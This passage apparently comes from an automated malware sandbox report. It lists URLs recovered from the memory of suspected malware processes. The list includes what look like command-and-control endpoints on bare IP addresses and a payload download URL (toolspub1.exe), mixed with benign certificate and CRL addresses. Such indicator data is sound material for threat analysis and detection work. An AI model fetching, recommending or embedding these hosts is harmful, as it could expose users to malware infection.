                    Source: syncUpd.exe, 00000016.00000002.3370913149.00000000006C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/sqlite3.dllCR
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/tware
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/vcruntime140.dll
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.172.128.145/15f649199f40275b/vcruntime140.dlltable
                    Source: syncUpd.exe, 00000016.00000002.3370913149.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp, syncUpd.exe, 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.145/3cd2b41cbde8fc9c.php
                    Source: syncUpd.exe, 00000016.00000002.3370913149.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.145/3cd2b41cbde8fc9c.phpK
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.172.128.145/3cd2b41cbde8fc9c.phpre
                    Source: syncUpd.exe, 00000016.00000002.3370913149.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.145/3cd2b41cbde8fc9c.phps
                    Source: syncUpd.exe, 00000016.00000002.3346089209.0000000000549000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.172.128.145/3cd2b41cbde8fc9c.phpte3.dllm-data;
                    Source: syncUpd.exe, 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.145/6
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000739000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610316156.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.187/
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614606913.0000000003080000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610316156.0000000000738000.00000004.00000020.00020000.00000000.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000002.3386681499.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000002.3394349460.0000000002C29000.00000004.00000020.00020000.00000000.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3395247637.0000000002D66000.00000004.00000020.00020000.00000000.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3390868030.000000000098E000.00000004.00000020.00020000.00000000.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000002.3392643713.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000002.3389719090.000000000081E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.187/ping.php?substr=seven
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.187/ping.php?substr=seven9
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000704000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.187/ping.php?substr=sevenSSOR_REVISION=8f08Prog
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000739000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610316156.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.187/ping.php?substr=sevenT
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.187/ping.php?substr=sevenminuser-l1-1-0
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000704000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.187/ping.php?substr=sevenocal
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.90/
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.90/=
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.000000000070F000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000739000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614606913.0000000003080000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610316156.0000000000738000.00000004.00000020.00020000.00000000.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000002.3386681499.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000002.3394349460.0000000002C29000.00000004.00000020.00020000.00000000.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3395247637.0000000002D66000.00000004.00000020.00020000.00000000.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3390868030.000000000098E000.00000004.00000020.00020000.00000000.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000002.3392643713.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000002.3389719090.000000000081E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=seven&s=ab
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000739000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610316156.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=seven&s=ab/
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614606913.0000000003080000.00000004.00000020.00020000.00000000.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000002.3386681499.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000002.3394349460.0000000002C29000.00000004.00000020.00020000.00000000.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3395247637.0000000002D66000.00000004.00000020.00020000.00000000.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3390868030.000000000098E000.00000004.00000020.00020000.00000000.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000002.3392643713.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000002.3389719090.000000000081E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=seven&s=ab/SILENT/TOSTACK/NOCANCELgethttp://185.172.128.18
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.000000000070F000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.000000000070F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=seven&s=abE
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000739000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610316156.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=seven&s=abI
                    Source: 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.90/q
                    Source: simplewebbuilder.exe, 00000011.00000002.3380805385.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, simplewebbuilder.exe, 00000011.00000002.3380805385.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, simplewebbuilder.exe, 00000011.00000002.3380805385.00000000008EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.16.74.230/
                    Source: simplewebbuilder.exe, 00000011.00000002.3380805385.00000000008EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.16.74.230/2
                    Source: simplewebbuilder.exe, 00000011.00000002.3406464331.0000000003338000.00000004.00000020.00020000.00000000.sdmp, simplewebbuilder.exe, 00000011.00000002.3380805385.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, simplewebbuilder.exe, 00000011.00000002.3380805385.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, simplewebbuilder.exe, 00000011.00000002.3380805385.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, simplewebbuilder.exe, 00000011.00000002.3380805385.00000000008EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.16.74.230/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e997834
                    Source: simplewebbuilder.exe, 00000011.00000002.3380805385.00000000008DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.16.74.230/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmp String found in binary or memory: http://autoupdate-staging.services.ams.osa/v4/v5/netinstaller///windows/x64v2/Fetching
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000329D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000361C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003295000.00000004.00000800.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.2670333851.00000000036E8000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000003.2965802948.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000329D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000361C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003295000.00000004.00000800.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.2670333851.00000000036E8000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000003.2965802948.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000329D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000361C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003295000.00000004.00000800.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.2670333851.00000000036E8000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000003.2965802948.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.000000000329D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000361C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003295000.00000004.00000800.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.2670333851.00000000036E8000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000003.2965802948.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.g
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/Root.crl0
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/primobject.crl0
                    Source: svchost.exe, 00000002.00000002.3430656539.000002191A400000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000329D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000361C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003295000.00000004.00000800.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.2670333851.00000000036E8000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000003.2965802948.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.2670333851.00000000036E8000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000003.2965802948.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000329D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000361C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003295000.00000004.00000800.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.2670333851.00000000036E8000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000003.2965802948.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.000000000361C000.00000004.00000800.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.2670333851.00000000036E8000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000003.2965802948.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
                    Source: svchost.exe, 00000002.00000003.2025274092.000002191A2C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.0000000003815000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036CC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003494000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://galandskiyher5.com
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003492000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000346F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003494000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032BB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036B2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://galandskiyher5.com/downloads/toolspub1.exe
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.0000000003492000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://galandskiyher5.com/downloads/toolspub1.exe4kL
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
